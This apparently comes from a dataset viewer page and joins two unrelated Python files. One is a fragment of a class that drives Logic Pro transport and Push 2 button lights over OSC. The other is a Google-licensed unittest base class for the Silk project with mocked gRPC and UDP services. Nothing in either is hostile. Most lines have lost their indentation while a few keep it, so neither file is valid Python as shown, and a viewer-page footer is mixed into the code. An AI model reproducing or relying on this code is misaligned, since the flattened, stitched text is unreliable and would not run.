        elif repeat:
            suffix = ''
        elif loop:
            suffix = '_loop'
        elif off:
            suffix = '_off'
        else:
            return
        self.osc_sender.send_message('/push2/quantize/{0}{1}'.format(base, suffix), [])
def double_loop(self):
self.osc_sender.send_message('/push2/double_loop', [])
def double(self):
self.osc_sender.send_message('/push2/double', [])
def convert(self):
self.osc_sender.send_message('/push2/convert', [])
def stop_clip(self):
self.osc_sender.send_message('/push2/stop_clip', [])
def mute(self):
self.osc_sender.send_message('/push2/mute', [])
def mute_off(self):
self.osc_sender.send_message('/push2/mute_off', [])
def solo(self):
self.osc_sender.send_message('/push2/solo', [])
def solo_lock(self):
self.osc_sender.send_message('/push2/solo_lock', [])
def undo(self):
self.osc_sender.send_message('/push2/undo', [])
def repeat_off(self):
self.osc_sender.send_message('/push2/repeat_off', [])
def redo(self):
self.osc_sender.send_message('/push2/redo', [])
def delete(self):
self.osc_sender.send_message('/push2/delete', [])
def pause(self):
self.osc_sender.send_message('/logic/transport/pause', [1.00])
def play(self):
if definitions.isPlaying:
self.osc_sender.send_message('/logic/transport/stop', [1.00])
else:
self.osc_sender.send_message('/logic/transport/play', [1.00])
def record(self):
self.osc_sender.send_message('/logic/transport/record', [1.00])
def arrow_keys(self, direction, shift, loop):
if direction == 'up':
if shift:
self.osc_sender.send_message('/push2/up_shift', [])
elif loop:
self.osc_sender.send_message('/push2/up_loop', [])
else:
self.osc_sender.send_message('/push2/up', [])
if direction == 'down':
if shift:
self.osc_sender.send_message('/push2/down_shift', [])
elif loop:
self.osc_sender.send_message('/push2/down_loop', [])
else:
self.osc_sender.send_message('/push2/down', [])
if direction == 'left':
if shift:
self.osc_sender.send_message('/push2/left_shift', [])
elif loop:
self.osc_sender.send_message('/push2/left_loop', [])
else:
self.osc_sender.send_message('/push2/left', [])
if direction == 'right':
if shift:
self.osc_sender.send_message('/push2/right_shift', [])
elif loop:
self.osc_sender.send_message('/push2/right_loop', [])
else:
self.osc_sender.send_message('/push2/right', [])
def metronome_on_off(self):
self.osc_sender.send_message('/logic/transport/click', [1.00])
def get_buttons_state(self):
        is_playing = bool(definitions.isPlaying)
        metronome_on = bool(definitions.isMetronome)
        is_recording = bool(definitions.isRecording)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_PLAY,
definitions.LIME if not is_playing else definitions.GREEN)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_RECORD,
definitions.GREEN if not is_recording else definitions.RED)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_METRONOME,
definitions.OFF_BTN_COLOR if not metronome_on else definitions.WHITE)
self.app.midi_cc_mode.update_buttons()
return is_playing, metronome_on, is_recording
def get_bpm(self):
return self.parsed_state.get('bpm', 120)
def set_bpm(self, bpm):
self.osc_sender.send_message('/transport/setBpm', [float(bpm)])
def bpm_lights(self, value):
beat = to_utf8(value)
beats = beat.split()
if int(float(beats[1])) % 2:
self.push.buttons.set_button_color(push2_python.constants.BUTTON_PLAY, definitions.GREEN)
for button_name in bpm_button_names:
self.set_button_color_if_expression(button_name, definitions.isRecording, definitions.RED,
definitions.GREEN)
else:
for button_name in bpm_button_names:
self.push.buttons.set_button_color(button_name, definitions.BLACK)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_PLAY, definitions.GREEN_DARK)
if definitions.isRecording:
if int(float(beats[1])) % 4:
self.push.buttons.set_button_color(push2_python.constants.BUTTON_RECORD, definitions.RED)
else:
self.push.buttons.set_button_color(push2_python.constants.BUTTON_RECORD, definitions.RED_DARK)
return True
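# Illustrative usage only (not part of the original module); `app` is assumed to be the
# application object the surrounding project passes to its modes:
#     interface = LogicInterface(app)
#     interface.play()        # sends /logic/transport/play or /stop, depending on definitions.isPlaying
#     interface.set_bpm(120)  # sends /transport/setBpm [120.0]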
|
testcase.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import threading
import tracemalloc
import unittest
from typing import List, Tuple
from silk.tools.otns_manager import OtnsManager
from silk.unit_tests.mock_service import MockGrpcClient, MockUDPServer
LOG_LINE_FORMAT = "[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s"
class SilkTestCase(unittest.TestCase):
"""Silk unit test base case.
"""
@classmethod
def setUpClass(cls) -> None:
tracemalloc.start()
logging.basicConfig(level=logging.DEBUG, format=LOG_LINE_FORMAT)
cls.logger = logging.Logger(cls.__name__)
class SilkMockingTestCase(SilkTestCase):
"""Silk test case with basic mocked OTNS and manager set up.
"""
def setUp(self):
"""Test method set up.
"""
self.exception_queue = queue.Queue()
self.manager = OtnsManager("localhost", self.logger.getChild("OtnsManager"))
self.grpc_client = MockGrpcClient(self.exception_queue, self.logger.getChild("MockGrpcClient"))
self.manager.grpc_client = self.grpc_client
self.udp_server = MockUDPServer(self.exception_queue)
def tearDown(self):
"""Test method tear down. Clean up fixtures.
"""
self.manager.unsubscribe_from_all_nodes()
self.manager.remove_all_nodes()
self.udp_server.close()
def wait_for_expect(self, expect_thread: threading.Thread):
"""Wait for expectation to be fulfilled.
Args:
expect_thread (threading.Thread): thread running expectation.
"""
while True:
try:
exception = self.exception_queue.get(block=False)
except queue.Empty:
pass
else:
self.fail(exception)
if expect_thread.is_alive():
expect_thread.join(0.1)
else:
break
def expect_grpc_commands(self, commands: List[str]) -> threading.Thread:
"""Create a thread for an expecting gRPC commands.
Args:
commands (List[str]): expecting gRPC commands.
Returns:
threading.Thread: thread running the expectation.
"""
expect_thread = threading.Thread(target=self.grpc_client.expect_commands, args=(commands,))
expect_thread.start()
return expect_thread
def expect_udp_messages(self, messages: List[Tuple[str, int]]) -> threading.Thread:
"""Create a thread for an expecting UDP message.
Args:
messages (List[Tuple[str, int]]): list of expected UDP messages and corresponding source ID.
Returns:
threading.Thread: thread running the expectation.
"""
# convert source IDs to source ports
messages = [(message, 9000 + source_id) for message, source_id in messages]
expect_thread = threading.Thread(target=self.udp_server.expect_messages, args=(messages,))
expect_thread.start()
return expect_thread
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.